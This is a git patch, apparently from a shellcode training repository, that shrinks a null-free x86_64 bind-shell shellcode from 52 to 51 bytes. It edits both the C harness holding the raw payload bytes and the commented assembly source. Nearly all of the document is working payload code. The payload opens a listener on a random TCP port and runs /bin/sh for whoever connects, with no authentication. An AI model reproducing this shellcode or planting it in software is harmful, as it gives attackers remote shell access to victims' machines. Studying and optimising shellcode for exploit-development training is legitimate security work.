From a2775f246f6552aab28766b89d2318821ebbcdb2 Mon Sep 17 00:00:00 2001 From: "Geyslan G. Bem" Date: Sat, 3 Apr 2021 11:37:01 -0300 Subject: [PATCH] shorter and shorter Signed-off-by: Geyslan G. Bem --- ...ell_bind_tcp_random_port_shellcode_x86_64.c | 12 ++++++------ .../tiny_shell_bind_tcp_random_port_x86_64.asm | 18 +++++++++--------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c b/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c index c80b147..7e31d32 100644 --- a/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c +++ b/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c @@ -28,7 +28,7 @@ assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm - * 52 bytes + * 51 bytes * null-free @@ -54,11 +54,11 @@ int main(void) const char code[] = "\x6a\x29\x58\x99\x6a\x01\x5e\x6a\x02\x5f" - "\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05\xb0" - "\x2b\x0f\x05\x97\x96\xff\xce\x6a\x21\x58" - "\x0f\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62" - "\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b" - "\x0f\x05"; + "\x0f\x05\x97\xb0\x32\x0f\x05\x96\xb0\x2b" + "\x0f\x05\x97\x96\xff\xce\x6a\x21\x58\x0f" + "\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62\x69" + "\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x0f" + "\x05"; // When contains null bytes, printf will show a wrong shellcode length. printf("Shellcode Length: %ld\n", strlen(code)); diff --git a/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm b/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm index 0309270..2056dba 100644 --- a/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm +++ b/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm @@ -37,7 +37,7 @@ ; tiny_shell_bind_tcp_random_port_x86_64 ; -; * 52 bytes +; * 51 bytes ; * null-free ; ; @@ -90,11 +90,9 @@ _start: ; Preparing to listen the incoming connection (passive socket) ; int listen(int sockfd, int backlog); - ; listen(sockfd, int); + ; listen(sockfd, 1); - ; listen arguments - push rdx ; put zero into rsi - pop rsi + ; listen arguments ; just let rsi (backlog) as 1 - man(2) listen xchg eax, edi ; put the file descriptor returned by socket() into rdi @@ -106,8 +104,9 @@ _start: ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); ; accept(sockfd, NULL, NULL) - ; accept arguments ; here we need only do nothing, the rdi already contains the sockfd, - ; likewise rsi and rdx contains 0 + ; accept arguments ; rdi already contains the sockfd, likewise rdx contains 0 + + xchg eax, esi ; put listen() return (0) into rsi mov al, 43 ; syscall 43 - accept syscall ; kernel interruption @@ -132,16 +131,17 @@ dup_loop: ; Finally, using execve to substitute the actual process with /bin/sh ; int execve(const char *filename, char *const argv[], char *const envp[]); - ; exevcve("/bin/sh", NULL, NULL) + ; exevcve("//bin/sh", NULL, NULL) ; execve string argument ; *envp[] rdx is already NULL ; *argv[] rsi is already NULL push rdx ; put NULL terminating string mov rdi, 0x68732f6e69622f2f ; "//bin/sh" - push rdi ; push /bin/sh string + push rdi ; push //bin/sh string push rsp ; push the stack pointer pop rdi ; pop it (string address) into rdi mov al, 59 ; execve syscall syscall ; bingo +